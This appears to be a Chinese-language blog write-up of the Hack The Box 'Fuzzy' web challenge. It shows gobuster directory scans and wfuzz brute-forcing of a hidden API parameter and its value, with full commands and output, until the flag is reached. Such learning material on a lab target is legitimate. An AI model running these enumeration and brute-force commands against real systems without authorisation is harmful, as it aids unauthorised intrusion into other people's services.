HTB(hack the box) Fuzzy
一年前就已经注册了hack the box,一直没用。如今开始在这个网站上学习。把自己的经过记下来吧。(国内好像很少用,几乎都没有writeup)
首先做一道20points的web题。
问题描述:
我们已经进入了一些基础设施,我们相信这些基础设施与我们的目标的内部网络相连。我们需要你帮助获取管理员密码的网站,他们目前正在开发。
进入网站的界面:
直接用gobuster来扫目录:
gobuster -u http://docker.hackthebox.eu:30059/ -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
-u 网站 -w 字典 -t 线程 -x 扩展名
结果:
root@kali:~# gobuster -u http://docker.hackthebox.eu:30059/ -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://docker.hackthebox.eu:30059/
[+] Threads : 50
[+] Wordlist : /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : htm,php,txt,html
[+] Timeout : 10s
=====================================================
2019/11/12 18:38:35 Starting gobuster
=====================================================
/index.html (Status: 200)
/css (Status: 301)
/js (Status: 301)
/api (Status: 301)
我们可以发现api这个目录。继续在这个目录下搜索。
gobuster -u http://docker.hackthebox.eu:30059/api/ -w /usr/share/dirbuste/wordlistr/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
结果:
root@kali:~# gobuster -u http://docker.hackthebox.eu:30059/api/ -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://docker.hackthebox.eu:30059/api/
[+] Threads : 50
[+] Wordlist : /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php,txt,html,htm
[+] Timeout : 10s
=====================================================
2019/11/12 18:44:53 Starting gobuster
=====================================================
/index.html (Status: 200)
/action.php (Status: 200)
action.php应该就是我们所需要的。进入发现:
说明使get传参。我们可以用wfuzz来进行爆破:
wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30059/api/action.php?FUZZ=testc
-hh=24 过滤源代码中的字符长度
-c 输出带颜色 -w 字典
FUZZ 猜测的位置
结果:
root@kali~# wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30059/api/action.php?FUZZ=test
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
Total requests: 20469
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000015356: 200 0 L 5 W 27 Ch "reset"
Total time: 399.9509
Processed Requests: 20469
Filtered Requests: 20468
Requests/sec.: 51.17877
页面:
开始猜测ID值:
wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30059/api/action.php?reset=FUZZ
结果:
root@kali~# wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30059/api/action.php?reset=FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
Total requests: 20469
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000318: 200 0 L 10 W 74 Ch "20"
说明值为20.
查看页面:
红色遮住的部分就是flag。